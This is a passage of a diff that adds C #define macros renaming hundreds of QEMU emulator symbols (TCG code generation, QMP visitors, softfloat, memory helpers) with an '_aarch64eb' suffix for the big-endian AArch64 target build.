qemu_clock_get_us_aarch64eb +#define qemu_clock_ptr qemu_clock_ptr_aarch64eb +#define qemu_clocks qemu_clocks_aarch64eb +#define qemu_get_cpu qemu_get_cpu_aarch64eb +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_aarch64eb +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_aarch64eb +#define qemu_get_ram_block qemu_get_ram_block_aarch64eb +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_aarch64eb +#define qemu_get_ram_fd qemu_get_ram_fd_aarch64eb +#define qemu_get_ram_ptr qemu_get_ram_ptr_aarch64eb +#define qemu_host_page_mask qemu_host_page_mask_aarch64eb +#define qemu_host_page_size qemu_host_page_size_aarch64eb +#define qemu_init_vcpu qemu_init_vcpu_aarch64eb +#define qemu_ld_helpers qemu_ld_helpers_aarch64eb +#define qemu_log_close qemu_log_close_aarch64eb +#define qemu_log_enabled qemu_log_enabled_aarch64eb +#define qemu_log_flush qemu_log_flush_aarch64eb +#define qemu_loglevel_mask qemu_loglevel_mask_aarch64eb +#define qemu_log_vprintf qemu_log_vprintf_aarch64eb +#define qemu_oom_check qemu_oom_check_aarch64eb +#define qemu_parse_fd qemu_parse_fd_aarch64eb +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_aarch64eb +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_aarch64eb +#define qemu_ram_alloc qemu_ram_alloc_aarch64eb +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_aarch64eb +#define qemu_ram_foreach_block qemu_ram_foreach_block_aarch64eb +#define qemu_ram_free qemu_ram_free_aarch64eb +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_aarch64eb +#define qemu_ram_ptr_length qemu_ram_ptr_length_aarch64eb +#define qemu_ram_remap qemu_ram_remap_aarch64eb +#define qemu_ram_setup_dump qemu_ram_setup_dump_aarch64eb +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_aarch64eb +#define qemu_real_host_page_size qemu_real_host_page_size_aarch64eb +#define qemu_st_helpers qemu_st_helpers_aarch64eb +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_aarch64eb +#define qemu_try_memalign qemu_try_memalign_aarch64eb +#define qentry_destroy qentry_destroy_aarch64eb +#define qerror_human qerror_human_aarch64eb +#define qerror_report qerror_report_aarch64eb +#define qerror_report_err qerror_report_err_aarch64eb +#define qfloat_destroy_obj qfloat_destroy_obj_aarch64eb +#define qfloat_from_double qfloat_from_double_aarch64eb +#define qfloat_get_double qfloat_get_double_aarch64eb +#define qfloat_type qfloat_type_aarch64eb +#define qint_destroy_obj qint_destroy_obj_aarch64eb +#define qint_from_int qint_from_int_aarch64eb +#define qint_get_int qint_get_int_aarch64eb +#define qint_type qint_type_aarch64eb +#define qlist_append_obj qlist_append_obj_aarch64eb +#define qlist_copy qlist_copy_aarch64eb +#define qlist_copy_elem qlist_copy_elem_aarch64eb +#define qlist_destroy_obj qlist_destroy_obj_aarch64eb +#define qlist_empty qlist_empty_aarch64eb +#define qlist_entry_obj qlist_entry_obj_aarch64eb +#define qlist_first qlist_first_aarch64eb +#define qlist_iter qlist_iter_aarch64eb +#define qlist_new qlist_new_aarch64eb +#define qlist_next qlist_next_aarch64eb +#define qlist_peek qlist_peek_aarch64eb +#define qlist_pop qlist_pop_aarch64eb +#define qlist_size qlist_size_aarch64eb +#define qlist_size_iter qlist_size_iter_aarch64eb +#define qlist_type qlist_type_aarch64eb +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_aarch64eb +#define qmp_input_end_list qmp_input_end_list_aarch64eb +#define qmp_input_end_struct qmp_input_end_struct_aarch64eb +#define qmp_input_get_next_type qmp_input_get_next_type_aarch64eb +#define qmp_input_get_object qmp_input_get_object_aarch64eb +#define qmp_input_get_visitor qmp_input_get_visitor_aarch64eb +#define qmp_input_next_list qmp_input_next_list_aarch64eb +#define qmp_input_optional qmp_input_optional_aarch64eb +#define qmp_input_pop qmp_input_pop_aarch64eb +#define qmp_input_push qmp_input_push_aarch64eb +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_aarch64eb +#define qmp_input_start_list qmp_input_start_list_aarch64eb +#define qmp_input_start_struct qmp_input_start_struct_aarch64eb +#define qmp_input_type_bool qmp_input_type_bool_aarch64eb +#define qmp_input_type_int qmp_input_type_int_aarch64eb +#define qmp_input_type_number qmp_input_type_number_aarch64eb +#define qmp_input_type_str qmp_input_type_str_aarch64eb +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_aarch64eb +#define qmp_input_visitor_new qmp_input_visitor_new_aarch64eb +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_aarch64eb +#define qmp_output_add_obj qmp_output_add_obj_aarch64eb +#define qmp_output_end_list qmp_output_end_list_aarch64eb +#define qmp_output_end_struct qmp_output_end_struct_aarch64eb +#define qmp_output_first qmp_output_first_aarch64eb +#define qmp_output_get_qobject qmp_output_get_qobject_aarch64eb +#define qmp_output_get_visitor qmp_output_get_visitor_aarch64eb +#define qmp_output_last qmp_output_last_aarch64eb +#define qmp_output_next_list qmp_output_next_list_aarch64eb +#define qmp_output_pop qmp_output_pop_aarch64eb +#define qmp_output_push_obj qmp_output_push_obj_aarch64eb +#define qmp_output_start_list qmp_output_start_list_aarch64eb +#define qmp_output_start_struct qmp_output_start_struct_aarch64eb +#define qmp_output_type_bool qmp_output_type_bool_aarch64eb +#define qmp_output_type_int qmp_output_type_int_aarch64eb +#define qmp_output_type_number qmp_output_type_number_aarch64eb +#define qmp_output_type_str qmp_output_type_str_aarch64eb +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_aarch64eb +#define qmp_output_visitor_new qmp_output_visitor_new_aarch64eb +#define qobject_decref qobject_decref_aarch64eb +#define qobject_to_qbool qobject_to_qbool_aarch64eb +#define qobject_to_qdict qobject_to_qdict_aarch64eb +#define qobject_to_qfloat qobject_to_qfloat_aarch64eb +#define qobject_to_qint qobject_to_qint_aarch64eb +#define qobject_to_qlist qobject_to_qlist_aarch64eb +#define qobject_to_qstring qobject_to_qstring_aarch64eb +#define qobject_type qobject_type_aarch64eb +#define qstring_append qstring_append_aarch64eb +#define qstring_append_chr qstring_append_chr_aarch64eb +#define qstring_append_int qstring_append_int_aarch64eb +#define qstring_destroy_obj qstring_destroy_obj_aarch64eb +#define qstring_from_escaped_str qstring_from_escaped_str_aarch64eb +#define qstring_from_str qstring_from_str_aarch64eb +#define qstring_from_substr qstring_from_substr_aarch64eb +#define qstring_get_length qstring_get_length_aarch64eb +#define qstring_get_str qstring_get_str_aarch64eb +#define qstring_new qstring_new_aarch64eb +#define qstring_type qstring_type_aarch64eb +#define ram_block_add ram_block_add_aarch64eb +#define ram_size ram_size_aarch64eb +#define range_compare range_compare_aarch64eb +#define range_covers_byte range_covers_byte_aarch64eb +#define range_get_last range_get_last_aarch64eb +#define range_merge range_merge_aarch64eb +#define ranges_can_merge ranges_can_merge_aarch64eb +#define raw_read raw_read_aarch64eb +#define raw_write raw_write_aarch64eb +#define rcon rcon_aarch64eb +#define read_raw_cp_reg read_raw_cp_reg_aarch64eb +#define recip_estimate recip_estimate_aarch64eb +#define recip_sqrt_estimate recip_sqrt_estimate_aarch64eb +#define register_cp_regs_for_features register_cp_regs_for_features_aarch64eb +#define register_multipage register_multipage_aarch64eb +#define register_subpage register_subpage_aarch64eb +#define register_tm_clones register_tm_clones_aarch64eb +#define register_types_object register_types_object_aarch64eb +#define regnames regnames_aarch64eb +#define render_memory_region render_memory_region_aarch64eb +#define reset_all_temps reset_all_temps_aarch64eb +#define reset_temp reset_temp_aarch64eb +#define rol32 rol32_aarch64eb +#define rol64 rol64_aarch64eb +#define ror32 ror32_aarch64eb +#define ror64 ror64_aarch64eb +#define roundAndPackFloat128 roundAndPackFloat128_aarch64eb +#define roundAndPackFloat16 roundAndPackFloat16_aarch64eb +#define roundAndPackFloat32 roundAndPackFloat32_aarch64eb +#define roundAndPackFloat64 roundAndPackFloat64_aarch64eb +#define roundAndPackFloatx80 roundAndPackFloatx80_aarch64eb +#define roundAndPackInt32 roundAndPackInt32_aarch64eb +#define roundAndPackInt64 roundAndPackInt64_aarch64eb +#define roundAndPackUint64 roundAndPackUint64_aarch64eb +#define round_to_inf round_to_inf_aarch64eb +#define run_on_cpu run_on_cpu_aarch64eb +#define s0 s0_aarch64eb +#define S0 S0_aarch64eb +#define s1 s1_aarch64eb +#define S1 S1_aarch64eb +#define sa1100_initfn sa1100_initfn_aarch64eb +#define sa1110_initfn sa1110_initfn_aarch64eb +#define save_globals save_globals_aarch64eb +#define scr_write scr_write_aarch64eb +#define sctlr_write sctlr_write_aarch64eb +#define set_bit set_bit_aarch64eb +#define set_bits set_bits_aarch64eb +#define set_default_nan_mode set_default_nan_mode_aarch64eb +#define set_feature set_feature_aarch64eb +#define set_float_detect_tininess set_float_detect_tininess_aarch64eb +#define set_float_exception_flags set_float_exception_flags_aarch64eb +#define set_float_rounding_mode set_float_rounding_mode_aarch64eb +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_aarch64eb +#define set_flush_to_zero set_flush_to_zero_aarch64eb +#define set_swi_errno set_swi_errno_aarch64eb +#define sextract32 sextract32_aarch64eb +#define sextract64 sextract64_aarch64eb +#define shift128ExtraRightJamming shift128ExtraRightJamming_aarch64eb +#define shift128Right shift128Right_aarch64eb +#define shift128RightJamming shift128RightJamming_aarch64eb +#define shift32RightJamming shift32RightJamming_aarch64eb +#define shift64ExtraRightJamming shift64ExtraRightJamming_aarch64eb +#define shift64RightJamming shift64RightJamming_aarch64eb +#define shifter_out_im shifter_out_im_aarch64eb +#define shortShift128Left shortShift128Left_aarch64eb +#define shortShift192Left shortShift192Left_aarch64eb +#define simple_mpu_ap_bits simple_mpu_ap_bits_aarch64eb +#define size_code_gen_buffer size_code_gen_buffer_aarch64eb +#define softmmu_lock_user softmmu_lock_user_aarch64eb +#define softmmu_lock_user_string softmmu_lock_user_string_aarch64eb +#define softmmu_tget32 softmmu_tget32_aarch64eb +#define softmmu_tget8 softmmu_tget8_aarch64eb +#define softmmu_tput32 softmmu_tput32_aarch64eb +#define softmmu_unlock_user softmmu_unlock_user_aarch64eb +#define sort_constraints sort_constraints_aarch64eb +#define sp_el0_access sp_el0_access_aarch64eb +#define spsel_read spsel_read_aarch64eb +#define spsel_write spsel_write_aarch64eb +#define start_list start_list_aarch64eb +#define stb_p stb_p_aarch64eb +#define stb_phys stb_phys_aarch64eb +#define stl_be_p stl_be_p_aarch64eb +#define stl_be_phys stl_be_phys_aarch64eb +#define stl_he_p stl_he_p_aarch64eb +#define stl_le_p stl_le_p_aarch64eb +#define stl_le_phys stl_le_phys_aarch64eb +#define stl_phys stl_phys_aarch64eb +#define stl_phys_internal stl_phys_internal_aarch64eb +#define stl_phys_notdirty stl_phys_notdirty_aarch64eb +#define store_cpu_offset store_cpu_offset_aarch64eb +#define store_reg store_reg_aarch64eb +#define store_reg_bx store_reg_bx_aarch64eb +#define store_reg_from_load store_reg_from_load_aarch64eb +#define stq_be_p stq_be_p_aarch64eb +#define stq_be_phys stq_be_phys_aarch64eb +#define stq_he_p stq_he_p_aarch64eb +#define stq_le_p stq_le_p_aarch64eb +#define stq_le_phys stq_le_phys_aarch64eb +#define stq_phys stq_phys_aarch64eb +#define string_input_get_visitor string_input_get_visitor_aarch64eb +#define string_input_visitor_cleanup string_input_visitor_cleanup_aarch64eb +#define string_input_visitor_new string_input_visitor_new_aarch64eb +#define strongarm_cp_reginfo strongarm_cp_reginfo_aarch64eb +#define strstart strstart_aarch64eb +#define strtosz strtosz_aarch64eb +#define strtosz_suffix strtosz_suffix_aarch64eb +#define stw_be_p stw_be_p_aarch64eb +#define stw_be_phys stw_be_phys_aarch64eb +#define stw_he_p stw_he_p_aarch64eb +#define stw_le_p stw_le_p_aarch64eb +#define stw_le_phys stw_le_phys_aarch64eb +#define stw_phys stw_phys_aarch64eb +#define stw_phys_internal stw_phys_internal_aarch64eb +#define sub128 sub128_aarch64eb +#define sub16_sat sub16_sat_aarch64eb +#define sub16_usat sub16_usat_aarch64eb +#define sub192 sub192_aarch64eb +#define sub8_sat sub8_sat_aarch64eb +#define sub8_usat sub8_usat_aarch64eb +#define subFloat128Sigs subFloat128Sigs_aarch64eb +#define subFloat32Sigs subFloat32Sigs_aarch64eb +#define subFloat64Sigs subFloat64Sigs_aarch64eb +#define subFloatx80Sigs subFloatx80Sigs_aarch64eb +#define subpage_accepts subpage_accepts_aarch64eb +#define subpage_init subpage_init_aarch64eb +#define subpage_ops subpage_ops_aarch64eb +#define subpage_read subpage_read_aarch64eb +#define subpage_register subpage_register_aarch64eb +#define subpage_write subpage_write_aarch64eb +#define suffix_mul suffix_mul_aarch64eb +#define swap_commutative swap_commutative_aarch64eb +#define swap_commutative2 swap_commutative2_aarch64eb +#define switch_mode switch_mode_aarch64eb +#define switch_v7m_sp switch_v7m_sp_aarch64eb +#define syn_aa32_bkpt syn_aa32_bkpt_aarch64eb +#define syn_aa32_hvc syn_aa32_hvc_aarch64eb +#define syn_aa32_smc syn_aa32_smc_aarch64eb +#define syn_aa32_svc syn_aa32_svc_aarch64eb +#define syn_breakpoint syn_breakpoint_aarch64eb +#define sync_globals sync_globals_aarch64eb +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_aarch64eb +#define syn_cp14_rt_trap syn_cp14_rt_trap_aarch64eb +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_aarch64eb +#define syn_cp15_rt_trap syn_cp15_rt_trap_aarch64eb +#define syn_data_abort syn_data_abort_aarch64eb +#define syn_fp_access_trap syn_fp_access_trap_aarch64eb +#define syn_insn_abort syn_insn_abort_aarch64eb +#define syn_swstep syn_swstep_aarch64eb +#define syn_uncategorized syn_uncategorized_aarch64eb +#define syn_watchpoint syn_watchpoint_aarch64eb +#define syscall_err syscall_err_aarch64eb +#define system_bus_class_init system_bus_class_init_aarch64eb +#define system_bus_info system_bus_info_aarch64eb +#define t2ee_cp_reginfo t2ee_cp_reginfo_aarch64eb +#define table_logic_cc table_logic_cc_aarch64eb +#define target_parse_constraint target_parse_constraint_aarch64eb +#define target_words_bigendian target_words_bigendian_aarch64eb +#define tb_add_jump tb_add_jump_aarch64eb +#define tb_alloc tb_alloc_aarch64eb +#define tb_alloc_page tb_alloc_page_aarch64eb +#define tb_check_watchpoint tb_check_watchpoint_aarch64eb +#define tb_find_fast tb_find_fast_aarch64eb +#define tb_find_pc tb_find_pc_aarch64eb +#define tb_find_slow tb_find_slow_aarch64eb +#define tb_flush tb_flush_aarch64eb +#define tb_flush_jmp_cache tb_flush_jmp_cache_aarch64eb +#define tb_free tb_free_aarch64eb +#define tb_gen_code tb_gen_code_aarch64eb +#define tb_hash_remove tb_hash_remove_aarch64eb +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_aarch64eb +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_aarch64eb +#define tb_invalidate_phys_range tb_invalidate_phys_range_aarch64eb +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_aarch64eb +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_aarch64eb +#define tb_jmp_remove tb_jmp_remove_aarch64eb +#define tb_link_page tb_link_page_aarch64eb +#define tb_page_remove tb_page_remove_aarch64eb +#define tb_phys_hash_func tb_phys_hash_func_aarch64eb +#define tb_phys_invalidate tb_phys_invalidate_aarch64eb +#define tb_reset_jump tb_reset_jump_aarch64eb +#define tb_set_jmp_target tb_set_jmp_target_aarch64eb +#define tcg_accel_class_init tcg_accel_class_init_aarch64eb +#define tcg_accel_type tcg_accel_type_aarch64eb +#define tcg_add_param_i32 tcg_add_param_i32_aarch64eb +#define tcg_add_param_i64 tcg_add_param_i64_aarch64eb +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_aarch64eb +#define tcg_allowed tcg_allowed_aarch64eb +#define tcg_canonicalize_memop tcg_canonicalize_memop_aarch64eb +#define tcg_commit tcg_commit_aarch64eb +#define tcg_cond_to_jcc tcg_cond_to_jcc_aarch64eb +#define tcg_constant_folding tcg_constant_folding_aarch64eb +#define tcg_const_i32 tcg_const_i32_aarch64eb +#define tcg_const_i64 tcg_const_i64_aarch64eb +#define tcg_const_local_i32 tcg_const_local_i32_aarch64eb +#define tcg_const_local_i64 tcg_const_local_i64_aarch64eb +#define tcg_context_init tcg_context_init_aarch64eb +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_aarch64eb +#define tcg_cpu_exec tcg_cpu_exec_aarch64eb +#define tcg_current_code_size tcg_current_code_size_aarch64eb +#define tcg_dump_info tcg_dump_info_aarch64eb +#define tcg_dump_ops tcg_dump_ops_aarch64eb +#define tcg_exec_all tcg_exec_all_aarch64eb +#define tcg_find_helper tcg_find_helper_aarch64eb +#define tcg_func_start tcg_func_start_aarch64eb +#define tcg_gen_abs_i32 tcg_gen_abs_i32_aarch64eb +#define tcg_gen_add2_i32 tcg_gen_add2_i32_aarch64eb +#define tcg_gen_add_i32 tcg_gen_add_i32_aarch64eb +#define tcg_gen_add_i64 tcg_gen_add_i64_aarch64eb +#define tcg_gen_addi_i32 tcg_gen_addi_i32_aarch64eb +#define tcg_gen_addi_i64 tcg_gen_addi_i64_aarch64eb +#define tcg_gen_andc_i32 tcg_gen_andc_i32_aarch64eb +#define tcg_gen_and_i32 tcg_gen_and_i32_aarch64eb +#define tcg_gen_and_i64 tcg_gen_and_i64_aarch64eb +#define tcg_gen_andi_i32 tcg_gen_andi_i32_aarch64eb +#define tcg_gen_andi_i64 tcg_gen_andi_i64_aarch64eb +#define tcg_gen_br tcg_gen_br_aarch64eb +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_aarch64eb +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_aarch64eb +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_aarch64eb +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_aarch64eb +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_aarch64eb +#define tcg_gen_callN tcg_gen_callN_aarch64eb +#define tcg_gen_code tcg_gen_code_aarch64eb +#define tcg_gen_code_common tcg_gen_code_common_aarch64eb +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_aarch64eb +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_aarch64eb +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_aarch64eb +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_aarch64eb +#define tcg_gen_exit_tb tcg_gen_exit_tb_aarch64eb +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_aarch64eb +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_aarch64eb +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_aarch64eb +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_aarch64eb +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_aarch64eb +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_aarch64eb +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_aarch64eb +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_aarch64eb +#define tcg_gen_goto_tb tcg_gen_goto_tb_aarch64eb +#define tcg_gen_ld_i32 tcg_gen_ld_i32_aarch64eb +#define tcg_gen_ld_i64 tcg_gen_ld_i64_aarch64eb +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_aarch64eb +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_aarch64eb +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_aarch64eb +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_aarch64eb +#define tcg_gen_mov_i32 tcg_gen_mov_i32_aarch64eb +#define tcg_gen_mov_i64 tcg_gen_mov_i64_aarch64eb +#define tcg_gen_movi_i32 tcg_gen_movi_i32_aarch64eb +#define tcg_gen_movi_i64 tcg_gen_movi_i64_aarch64eb +#define tcg_gen_mul_i32 tcg_gen_mul_i32_aarch64eb +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_aarch64eb +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_aarch64eb +#define tcg_gen_neg_i32 tcg_gen_neg_i32_aarch64eb +#define tcg_gen_neg_i64 tcg_gen_neg_i64_aarch64eb +#define tcg_gen_not_i32 tcg_gen_not_i32_aarch64eb +#define tcg_gen_op0 tcg_gen_op0_aarch64eb +#define tcg_gen_op1i tcg_gen_op1i_aarch64eb +#define tcg_gen_op2_i32 tcg_gen_op2_i32_aarch64eb +#define tcg_gen_op2_i64 tcg_gen_op2_i64_aarch64eb +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_aarch64eb +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_aarch64eb +#define tcg_gen_op3_i32 tcg_gen_op3_i32_aarch64eb +#define tcg_gen_op3_i64 tcg_gen_op3_i64_aarch64eb +#define tcg_gen_op4_i32 tcg_gen_op4_i32_aarch64eb +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_aarch64eb +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_aarch64eb +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_aarch64eb +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_aarch64eb +#define tcg_gen_op6_i32 tcg_gen_op6_i32_aarch64eb +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_aarch64eb +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_aarch64eb +#define tcg_gen_orc_i32 tcg_gen_orc_i32_aarch64eb +#define tcg_gen_or_i32 tcg_gen_or_i32_aarch64eb +#define tcg_gen_or_i64 tcg_gen_or_i64_aarch64eb +#define tcg_gen_ori_i32 tcg_gen_ori_i32_aarch64eb +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_aarch64eb +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_aarch64eb +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_aarch64eb +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_aarch64eb +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_aarch64eb +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_aarch64eb +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_aarch64eb +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_aarch64eb +#define tcg_gen_sar_i32 tcg_gen_sar_i32_aarch64eb +#define tcg_gen_sari_i32 tcg_gen_sari_i32_aarch64eb +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_aarch64eb +#define tcg_gen_shl_i32 tcg_gen_shl_i32_aarch64eb +#define tcg_gen_shl_i64 tcg_gen_shl_i64_aarch64eb +#define tcg_gen_shli_i32 tcg_gen_shli_i32_aarch64eb +#define tcg_gen_shli_i64 tcg_gen_shli_i64_aarch64eb +#define tcg_gen_shr_i32 tcg_gen_shr_i32_aarch64eb +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_aarch64eb +#define tcg_gen_shr_i64 tcg_gen_shr_i64_aarch64eb +#define tcg_gen_shri_i32 tcg_gen_shri_i32_aarch64eb +#define tcg_gen_shri_i64 tcg_gen_shri_i64_aarch64eb +#define tcg_gen_st_i32 tcg_gen_st_i32_aarch64eb +#define tcg_gen_st_i64 tcg_gen_st_i64_aarch64eb +#define tcg_gen_sub_i32 tcg_gen_sub_i32_aarch64eb +#define tcg_gen_sub_i64 tcg_gen_sub_i64_aarch64eb +#define tcg_gen_subi_i32 tcg_gen_subi_i32_aarch64eb +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_aarch64eb +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_aarch64eb +#define tcg_gen_xor_i32 tcg_gen_xor_i32_aarch64eb +#define tcg_gen_xor_i64 tcg_gen_xor_i64_aarch64eb +#define tcg_gen_xori_i32 tcg_gen_xori_i32_aarch64eb +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_aarch64eb +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_aarch64eb +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_aarch64eb +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_aarch64eb +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_aarch64eb +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_aarch64eb +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_aarch64eb +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_aarch64eb +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_aarch64eb +#define tcg_handle_interrupt tcg_handle_interrupt_aarch64eb +#define tcg_init tcg_init_aarch64eb +#define tcg_invert_cond tcg_invert_cond_aarch64eb +#define tcg_la_bb_end tcg_la_bb_end_aarch64eb +#define tcg_la_br_end tcg_la_br_end_aarch64eb +#define tcg_la_func_end tcg_la_func_end_aarch64eb +#define tcg_liveness_analysis tcg_liveness_analysis_aarch64eb +#define tcg_malloc tcg_malloc_aarch64eb +#define tcg_malloc_internal tcg_malloc_internal_aarch64eb +#define tcg_op_defs_org tcg_op_defs_org_aarch64eb +#define tcg_opt_gen_mov tcg_opt_gen_mov_aarch64eb +#define tcg_opt_gen_movi tcg_opt_gen_movi_aarch64eb +#define tcg_optimize tcg_optimize_aarch64eb +#define tcg_out16 tcg_out16_aarch64eb +#define tcg_out32 tcg_out32_aarch64eb +#define tcg_out64 tcg_out64_aarch64eb +#define tcg_out8 tcg_out8_aarch64eb +#define tcg_out_addi tcg_out_addi_aarch64eb +#define tcg_out_branch tcg_out_branch_aarch64eb +#define tcg_out_brcond32 tcg_out_brcond32_aarch64eb +#define tcg_out_brcond64 tcg_out_brcond64_aarch64eb +#define tcg_out_bswap32 tcg_out_bswap32_aarch64eb +#define tcg_out_bswap64 tcg_out_bswap64_aarch64eb +#define tcg_out_call tcg_out_call_aarch64eb +#define tcg_out_cmp tcg_out_cmp_aarch64eb +#define tcg_out_ext16s tcg_out_ext16s_aarch64eb +#define tcg_out_ext16u tcg_out_ext16u_aarch64eb +#define tcg_out_ext32s tcg_out_ext32s_aarch64eb +#define tcg_out_ext32u tcg_out_ext32u_aarch64eb +#define tcg_out_ext8s tcg_out_ext8s_aarch64eb +#define tcg_out_ext8u tcg_out_ext8u_aarch64eb +#define tcg_out_jmp tcg_out_jmp_aarch64eb +#define tcg_out_jxx tcg_out_jxx_aarch64eb +#define tcg_out_label tcg_out_label_aarch64eb +#define tcg_out_ld tcg_out_ld_aarch64eb +#define tcg_out_modrm tcg_out_modrm_aarch64eb +#define tcg_out_modrm_offset tcg_out_modrm_offset_aarch64eb +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_aarch64eb +#define tcg_out_mov tcg_out_mov_aarch64eb +#define tcg_out_movcond32 tcg_out_movcond32_aarch64eb +#define tcg_out_movcond64 tcg_out_movcond64_aarch64eb +#define tcg_out_movi tcg_out_movi_aarch64eb +#define tcg_out_op tcg_out_op_aarch64eb +#define tcg_out_pop tcg_out_pop_aarch64eb +#define tcg_out_push tcg_out_push_aarch64eb +#define tcg_out_qemu_ld tcg_out_qemu_ld_aarch64eb +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_aarch64eb +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_aarch64eb +#define tcg_out_qemu_st tcg_out_qemu_st_aarch64eb +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_aarch64eb +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_aarch64eb +#define tcg_out_reloc tcg_out_reloc_aarch64eb +#define tcg_out_rolw_8 tcg_out_rolw_8_aarch64eb +#define tcg_out_setcond32 tcg_out_setcond32_aarch64eb +#define tcg_out_setcond64 tcg_out_setcond64_aarch64eb +#define tcg_out_shifti tcg_out_shifti_aarch64eb +#define tcg_out_st tcg_out_st_aarch64eb +#define tcg_out_tb_finalize tcg_out_tb_finalize_aarch64eb +#define tcg_out_tb_init tcg_out_tb_init_aarch64eb +#define tcg_out_tlb_load tcg_out_tlb_load_aarch64eb +#define tcg_out_vex_modrm tcg_out_vex_modrm_aarch64eb +#define tcg_patch32 tcg_patch32_aarch64eb +#define tcg_patch8 tcg_patch8_aarch64eb +#define tcg_pcrel_diff tcg_pcrel_diff_aarch64eb +#define tcg_pool_reset tcg_pool_reset_aarch64eb +#define tcg_prologue_init tcg_prologue_init_aarch64eb +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_aarch64eb +#define tcg_reg_alloc tcg_reg_alloc_aarch64eb +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_aarch64eb +#define tcg_reg_alloc_call tcg_reg_alloc_call_aarch64eb +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_aarch64eb +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_aarch64eb +#define tcg_reg_alloc_op tcg_reg_alloc_op_aarch64eb +#define tcg_reg_alloc_start tcg_reg_alloc_start_aarch64eb +#define tcg_reg_free tcg_reg_free_aarch64eb +#define tcg_reg_sync tcg_reg_sync_aarch64eb +#define tcg_set_frame tcg_set_frame_aarch64eb +#define tcg_set_nop tcg_set_nop_aarch64eb +#define tcg_swap_cond tcg_swap_cond_aarch64eb +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_aarch64eb +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_aarch64eb +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_aarch64eb +#define tcg_target_const_match tcg_target_const_match_aarch64eb +#define tcg_target_init tcg_target_init_aarch64eb +#define tcg_target_qemu_prologue 